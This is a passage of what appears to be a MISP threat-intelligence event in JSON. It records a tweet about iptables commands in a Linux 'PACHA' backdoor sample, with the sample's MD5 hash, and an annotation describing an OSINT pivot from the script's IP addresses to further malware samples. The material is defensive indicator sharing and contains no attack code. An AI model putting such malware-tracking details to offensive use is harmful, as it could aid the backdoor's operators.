"template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",
"template_version": "6",
"timestamp": "1559380680",
"uuid": "5cf241f4-75b0-43e7-80fe-4487950d210f",
"ObjectReference": [
{
"comment": "",
"object_uuid": "5cf241f4-75b0-43e7-80fe-4487950d210f",
"referenced_uuid": "5cf2421b-bba0-4844-8d28-43c9950d210f",
"relationship_type": "abuses",
"timestamp": "1559380680",
"uuid": "5cf242c8-6570-4a76-95d9-4afd950d210f"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "post",
"timestamp": "1559380468",
"to_ids": false,
"type": "text",
"uuid": "5cf241f4-6b14-49eb-a550-4c70950d210f",
"value": "latest iptables commands found in new linux #PACHA backdoor sample, MD5=a4ef2477af0c769bb2043bca6b5843c2, the ACCEPTED IP should all be blacklisted."
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1559380468",
"to_ids": false,
"type": "text",
"uuid": "5cf241f4-0f14-491e-b20a-40fa950d210f",
"value": "Twitter"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1559380468",
"to_ids": true,
"type": "url",
"uuid": "5cf241f4-ce4c-45d4-b3f5-465a950d210f",
"value": "https://twitter.com/liuya0904/status/1134660970112999425"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "username",
"timestamp": "1559380468",
"to_ids": false,
"type": "text",
"uuid": "5cf241f4-51f8-4638-bd9d-4623950d210f",
"value": "liuya0904"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1559380468",
"to_ids": false,
"type": "text",
"uuid": "5cf241f4-54ac-4527-ae4e-45b3950d210f",
"value": "Informative"
}
]
},
{
"comment": "",
"deleted": false,
"description": "An annotation object allowing analysts to add annotations, comments, executive summary to a MISP event, objects or attributes.",
"meta-category": "misc",
"name": "annotation",
"template_uuid": "5d8dc046-15a1-4ca3-a09f-ed4ede7c4487",
"template_version": "2",
"timestamp": "1559381028",
"uuid": "5cf24424-33b4-488b-8202-4db5950d210f",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "format",
"timestamp": "1559381028",
"to_ids": false,
"type": "text",
"uuid": "5cf24424-8ee8-46e5-93a9-4a45950d210f",
"value": "markdown"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1559381028",
"to_ids": false,
"type": "text",
"uuid": "5cf24424-1584-4e9c-9fea-45e7950d210f",
"value": "Annotation"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "text",
"timestamp": "1559381028",
"to_ids": false,
"type": "text",
"uuid": "5cf24424-c33c-4187-8f6d-4907950d210f",
"value": "OSINT investigation based on the original tweet from Liu Ya which contains a netfilter/iptables script with some IP addresses. By pivoting from the IP addresses, malware samples and scripts can be found at different locations. This quick analysis includes the scripts collected, the samples and the relationships between the various objects."
}
]
}
]
}
}